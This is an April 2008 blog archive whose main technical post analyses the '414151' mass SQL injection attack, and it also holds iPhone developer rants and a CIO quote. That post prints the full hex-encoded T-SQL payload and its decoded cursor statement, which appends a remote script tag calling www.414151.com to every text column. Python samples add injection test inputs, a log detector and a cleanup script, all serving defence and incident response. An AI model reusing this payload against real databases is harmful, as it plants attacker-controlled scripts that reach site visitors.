Archive for April, 2008

Returned meself an iPhone!

April 23rd, 2008

Yup, had enough.  So three major reasons:

  1. Can’t get my iPhone provisioned so that I can put the applications I write on to it because the iPhone Developer program is closed at the moment.  (See my other posts on the subject)
  2. New 3G iPhone is strongly rumored to be coming out in the summer
  3. Email is just painful.  Yahoo push mail is a joke.  I blame both Apple and Yahoo for this, but mostly I believe it’s because of EDGE.  My hope is that the 3G iPhone will have a chance of having productive like email capabilities.

My conclusion was to return the iPhone (can do this within 30 days), get the free Nokia and then, come this summer, upgrade to a new iPhone 2.0 with 3G.  The rumors are also that the developer program will open up after the SDK is officially released.

My appreciation to the ATT store at 78th and Broadway for being so nice and understanding. 

Posted by Barry | Filed in soul

Apple: iPhone Developer Program on Hold. Barry: You Mother @#*)%$’s

April 22nd, 2008

Sorry, but I am still steamed over the whole Developer program.  Needed just one more rant about it…


Well, talk about taking the wind out of your sails.

Watch the momentum grow:

  1. I jumped in head first, bought an iPhone - hearts beating, new toy, I can touch it and it vibrates…
  2. Downloaded the SDK - WOW, Apple seems to have their shit together, gonna write my first Apple based program since college…
  3. Installed the tools - can’t believe Apple made good tools finally, the simulator looks rockin…
  4. Watched the videos - these are great, why are they all wearing the same tshirt, hope they make more of these…
  5. Read the documentation - ok, not so great, but more than I expected, they seem to be locking down the beta pretty good, why aren’t there more articles…
  6. Wrote my first program - heart is really racing now, I think I can do this, imagine the possibilities…
  7. Ran my app on the simulator - This thing really does rock, I hope it works this great on my phone, can’t wait to make my first commercial app, I am going to be a star at work, chicks will dig me…
  8. Switch the target from simulator to device - What does it mean "provision"?

So until they open back up the Developer program, which is another friggin $100 I am more than willing to pay, I can’t "provision" my friggin iPhone.

OY.  Maybe the chicks will dig the simulator?  Hold on while I compile….

More info: 

http://www.macrumors.com/2008/03/14/apple-slowly-ramping-up-iphone-developer-program/

http://www.tuaw.com/2008/03/14/iphone-developer-rejection-letter-mass-mailing/

http://twitter.com/danielpunkass/statuses/771541151

http://twitter.com/davidweiss/statuses/771549002

http://www.iphoneatlas.com/2008/03/14/apple-rejecting-iphone-sdk-applicants-en-masse/

Posted by Barry | Filed in soul, via

Got meself an iPhone

April 18th, 2008

So I got a hankering to make me some iPhone apps…Ok, I will stop talking like that.  But it really was like that - last weekend I decided I wanted to make some simple iPhone apps, so I downloaded the SDK, signed up for the developer program and then earlier this week I bought myself an iPhone.

According to Mossberg that was probably a mistake, and probably a bigger one than I realized.  He thinks the 3G version is coming out in June.  My bad was that I didn’t realize it, but in order to actually install the programs you write with the SDK on to your device it needs to be "provisioned".  Maybe this is an Apple thing, but this is my first venture into Apple coding so I was surprised by this.  Anyway, I can’t get provisioned until I am accepted into the developer program and pay my $99.  And at the moment they are not accepting applications:

Thank you for applying to the iPhone Developer Program. We have many more requests than we can serve during this initial beta period, so we must limit the Program at this time. We plan to expand it during the beta period, and we will contact you regarding your enrollment status at the appropriate time. We appreciate your patience.

I hope to keep writing about my experience, but for now.  See ya.

Posted by Barry | Filed in soul

SQL Injection is cool

April 18th, 2008

Overview

So seeing sites hacked is pretty cool unless it’s one of yours.  I kinda look at hacking as the end-all-be-all of elite programming.  Of course, the intent isn’t always good, but the techniques are artful.  I most recently witnessed an impressive SQL Injection hack on a website.  I refer to it as the "414151 Hack", but others are calling a similar hack the "IFRAME SEO Poisoning Attack", which appears to be the same code just implemented a little differently.  Of course, anyone who has been hacked by this code will recognize those numbers.  As far as SQL Injection attacks go, this one seems to have taken a similarly systematic approach.  I am not going to explain how SQL Injection works or the techniques hackers use - there are plenty of sources on the internet for that.  I will list some references at the end.

The Details

There were a couple things that impressed me about this particular hack.

  1. The outcome was that the hack code appended a <script> tag with a reference URL to every varchar column in the database.  The site was running .Net and IIS with SQL Server 2000.  I mention the technology because the script assumes SQL Server.  That said, don’t fool yourself into thinking that this is some hole within .Net, IIS or SQL Server - these attacks are due to lazy programmers who implement bad practices, specifically inline or free-form SQL statements built inside application code, and the same attack could occur on almost any platform, language or database.  The effect on users was a slow page, because the referenced script didn’t resolve.  That was fortunate, since there is no telling what other damage might have been done if the script had been active.
  2. The second thing that impressed me was the actual code that executed this varchar manipulation.  It was elegantly disguised (not sure if that was the intent) within a long hexadecimal string that when interpreted was an equally elegant SQL statement.
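
The "inline or free SQL" practice blamed above, shown beside the parameterized form that fixes it.  This is an added example, not code from the post or from the hacked site: it uses Python with an in-memory SQLite database rather than .Net and SQL Server 2000, because the defect and the cure are the same on every platform and driver (user text must travel as a bound parameter, never be spliced into the statement text).  The table, its rows and the three search terms are constructed for the demo.

```python
import sqlite3

# Constructed sample table: a tiny product catalog in an in-memory SQLite database.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    conn.executemany(
        "INSERT INTO products (name, description) VALUES (?, ?)",
        [("Widget", "A small widget"), ("Gadget", "A handy gadget"), ("O'Ring", "Rubber seal")],
    )
    return conn

def search_unsafe(conn, term):
    """Inline SQL built by string concatenation: the search term becomes part of
    the statement's grammar, so a quote in the input changes what gets executed."""
    sql = "SELECT name FROM products WHERE name = '" + term + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]

def search_safe(conn, term):
    """Parameterized query: the driver sends the term as a value, never as SQL text,
    so quotes and keywords in the input are just characters to compare against."""
    sql = "SELECT name FROM products WHERE name = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (term,))]

def compare(term):
    """Run both versions on the same input; "error" records that the inline version
    raised a syntax error instead of returning rows."""
    conn = make_db()
    try:
        unsafe = search_unsafe(conn, term)
    except sqlite3.OperationalError:
        unsafe = "error"
    return {"unsafe": unsafe, "safe": search_safe(conn, term)}

if __name__ == "__main__":
    # A normal term, a legitimate name containing an apostrophe, and the textbook
    # tautology input: only the inline version breaks or leaks rows on the last two.
    for term in ("Widget", "O'Ring", "' OR '1'='1"):
        print(repr(term), compare(term))
```

The apostrophe case is the one that usually gets noticed first in production (a customer named O’Ring produces a syntax error); the tautology case is the same defect viewed from the attacker’s side, where the input rewrites the WHERE clause and every row comes back.  The parameterized version returns exactly one row, zero rows and zero rows respectively.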

The Possibilities

The possibilities of this hack scare me (and impress me).  When I started searching around the web for this 414151 script I found a good number of references.  Unfortunately, I didn’t find too many people talking about the hack but instead I found hundreds of sites that were actually hacked also.  I list one link below of an article that talks about it quite a lot.  According to this article many large websites such as USA Today, ABC News, Target, Walmart, etc… have all been infected with a similar hack.

It is quite frightening to think of such an effective and widespread hack that is basically designed to "phone home" and execute some unknown JavaScript whenever the author decides to turn on his website (a synchronized attack scenario)… well, I think it would have made the news.

The Javascript

<script src=http://www.414151.com/fjp.js></script>

The Hexadecimal

4400450043004C00410052004500200040005400200076006100720
06300680061007200280032003500350029002C00400043002000760061007
20063006800610072002800320035003500290020004400450043004C00
41005200450020005400610062006C0065005F0043007500720073006F
007200200043005500520053004F005200200046004F005200200073006
5006C00650063007400200061002E006E0061006D0065002C0062002E
006E0061006D0065002000660072006F006D0020007300790073006F006
2006A006500630074007300200061002C0073007900730063006F006C
0075006D006E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E006400200061002E
00780074007900700065003D00270075002700200061006E00640020002
80062002E00780074007900700065003D003900390020006F007200200
062002E00780074007900700065003D003300350020006F007200200062
002E00780074007900700065003D0032003300310020006F0072002000
62002E00780074007900700065003D00310036003700290020004F00500
045004E0020005400610062006C0065005F0043007500720073006F007
20020004600450054004300480020004E004500580054002000460052004
F004D00200020005400610062006C0065005F0043007500720073006F
007200200049004E0054004F002000400054002C0040004300200057004
80049004C004500280040004000460045005400430048005F005300540
041005400550053003D0030002900200042004500470049004E00200065
007800650063002800270075007000640061007400650020005B002700
2B00400054002B0027005D00200073006500740020005B0027002B0040
0043002B0027005D003D0072007400720069006D00280063006F006E0
07600650072007400280076006100720063006800610072002C005B0027
002B00400043002B0027005D00290029002B00270027003C007300630
0720069007000740020007300720063003D0068007400740070003A002F
002F007700770077002E003400310034003100350031002E0063006F00
6D002F0066006A0070002E006A0073003E003C002F0073006300720069
00700074003E0027002700270029004600450054004300480020004E00
4500580054002000460052004F004D00200020005400610062006C00650
05F0043007500720073006F007200200049004E0054004F00200040005
4002C0040004300200045004E004400200043004C004F00530045002000
5400610062006C0065005F0043007500720073006F0072002000440045
0041004C004C004F00430041005400450020005400610062006C0065005
F0043007500720073006F007200
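
Why a hex string hides a SQL statement: SQL Server stores nvarchar as UTF-16LE, so every ASCII character becomes one byte followed by a 00 byte, which is the "XX00" rhythm visible in the dump above.  The following Python is an added example, not code from the post: it decodes the first three lines of the hex above (copied verbatim) back into the opening of the statement, and then applies the same decoding as a detection check over constructed web-server log lines, flagging long hex runs in requests that decode to printable text carrying SQL or script keywords while leaving ordinary hashes alone.  The log lines, the URLs and the 32-byte threshold are my own constructed choices.

```python
import re

# First three lines of the hex string quoted in the post (copied verbatim).
# Every other byte is 00 because the text is UTF-16LE, the encoding SQL Server
# uses for nvarchar, which is why the blob reads as plain T-SQL once converted.
PAYLOAD_HEX_PREFIX = (
    "4400450043004C00410052004500200040005400200076006100720"
    "06300680061007200280032003500350029002C00400043002000760061007"
    "20063006800610072002800320035003500290020004400450043004C00"
)

def decode_utf16le_hex(hex_text):
    """Decode a run of hex digits as UTF-16LE text. Whitespace (line breaks in a
    quoted payload) is ignored; odd-length input or a broken code unit raises."""
    digits = re.sub(r"\s+", "", hex_text)
    if len(digits) % 2:
        raise ValueError("odd number of hex digits")
    return bytes.fromhex(digits).decode("utf-16-le")

# A run of at least 32 bytes of hex is long enough to hold a statement fragment;
# ordinary hashes of that size are filtered out by the decode check below.
HEX_RUN = re.compile(r"(?:[0-9A-Fa-f]{2}){32,}")
SQL_MARKERS = ("DECLARE", "EXEC", "UPDATE", "CURSOR", "<SCRIPT")

def find_encoded_sql(log_lines):
    """Return [(line_number, decoded_text)] for log lines containing a hex run that
    decodes to printable ASCII carrying SQL or script keywords."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        for match in HEX_RUN.finditer(line):
            try:
                text = decode_utf16le_hex(match.group(0))
            except (ValueError, UnicodeDecodeError):
                continue
            if not (text.isascii() and text.isprintable()):
                continue  # random bytes (e.g. a SHA-256) decode to non-ASCII code points
            if any(marker in text.upper() for marker in SQL_MARKERS):
                hits.append((number, text))
    return hits

# Constructed web-server log lines (not real traffic): the first carries the encoded
# payload in its query string, the second is a normal request, the third contains a
# legitimate 64-digit hash (SHA-256 of the empty string) that must not be flagged.
SAMPLE_LOG = [
    "2008-04-18 03:12:07 GET /catalog.aspx id=12;0x" + PAYLOAD_HEX_PREFIX + " 200",
    "2008-04-18 03:12:09 GET /catalog.aspx id=12 200",
    "2008-04-18 03:12:11 GET /download.aspx digest="
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 200",
]

if __name__ == "__main__":
    print(decode_utf16le_hex(PAYLOAD_HEX_PREFIX))
    for number, text in find_encoded_sql(SAMPLE_LOG):
        print(f"line {number}: {text[:60]}...")
```

Running the prefix through decode_utf16le_hex gives "DECLARE @T varchar(255),@C varchar(255) DECL", the start of the statement in the next section; the full string decodes the same way.  The log check is deliberately conservative: it only reports a run that decodes to clean, printable ASCII containing one of the keywords, so a hash or a binary token in a URL does not generate noise.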

The SQL Statement

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u'
  and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.414151.com/fjp.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
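
The cursor above walks sysobjects/syscolumns to reach every text column (xtype 99, 35, 231 and 167 are ntext, text, nvarchar and varchar) of every user table, so an incident responder needs the same walk in the other direction: enumerate every text column, count the rows that carry the appended tag, then strip it.  The following Python/SQLite code is an added example and not from the post or the affected site (on SQL Server 2000 the enumeration is the sysobjects/syscolumns join shown in the statement itself); the tables, rows and the rows pre-loaded with the marker are constructed for the demo.

```python
import sqlite3

# The tag the post says was appended to every varchar column (taken from the statement above).
MARKER = "<script src=http://www.414151.com/fjp.js></script>"

def text_columns(conn):
    """Yield (table, column) for every character/text column of every user table:
    the defender's counterpart of the attack's sysobjects/syscolumns cursor."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, name, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if ctype and ("CHAR" in ctype.upper() or "TEXT" in ctype.upper()):
                yield table, name

def scan_for_marker(conn, marker=MARKER):
    """Return {(table, column): affected_row_count} for columns containing the marker.
    Identifiers cannot be bound as parameters, so they are quoted; the marker is bound."""
    found = {}
    for table, col in text_columns(conn):
        n = conn.execute(
            f'SELECT COUNT(*) FROM "{table}" WHERE instr("{col}", ?) > 0', (marker,)
        ).fetchone()[0]
        if n:
            found[(table, col)] = n
    return found

def strip_marker(conn, marker=MARKER):
    """Remove every occurrence of the marker from the affected columns; returns rows changed."""
    changed = 0
    for table, col in scan_for_marker(conn, marker):
        cur = conn.execute(
            f'UPDATE "{table}" SET "{col}" = replace("{col}", ?, ?) WHERE instr("{col}", ?) > 0',
            (marker, "", marker),
        )
        changed += cur.rowcount
    conn.commit()
    return changed

def build_sample_db():
    """Constructed sample: two user tables, several rows already carrying the marker."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(255), description TEXT, price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, title VARCHAR(255), body TEXT);
    """)
    conn.executemany("INSERT INTO products (name, description, price) VALUES (?, ?, ?)", [
        ("Widget" + MARKER, "Small widget" + MARKER, 9.99),
        ("Gadget" + MARKER, "Handy gadget", 19.99),
        ("Sprocket", "Clean row", 4.50),
    ])
    conn.executemany("INSERT INTO news (title, body) VALUES (?, ?)", [
        ("Launch day" + MARKER, "We launched." + MARKER),
    ])
    conn.commit()
    return conn

if __name__ == "__main__":
    db = build_sample_db()
    print("before:", scan_for_marker(db))
    print("rows cleaned:", strip_marker(db))
    print("after:", scan_for_marker(db))
```

Scanning before cleanup reports two hits in products.name, one in products.description and one each in news.title and news.body; strip_marker then changes five rows and a second scan comes back empty.  Keep the scan step separate from the cleanup so the affected column list can be recorded before anything is modified, and restore from backup rather than stripping if the appended tag ever varies, since a replace only removes the exact string it was given.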

Other references

Update (4/29)…

This one keeps going and going.

I also wanted to add that another very impressive part of this hack is how the hacker finds a vulnerable page and then iterates through many different scenarios until one clicks.  I didn’t mention this earlier because this is inherent in all SQL Injection attacks.

Posted by Barry | Filed in soul

Good quote from CIO mag

April 17th, 2008

Any IT organization that’s willing to do without training, innovation, process improvements, client relationship building and other "keep-the-business-viable" activities is only postponing its inevitable demise.

Posted by Barry | Filed in soul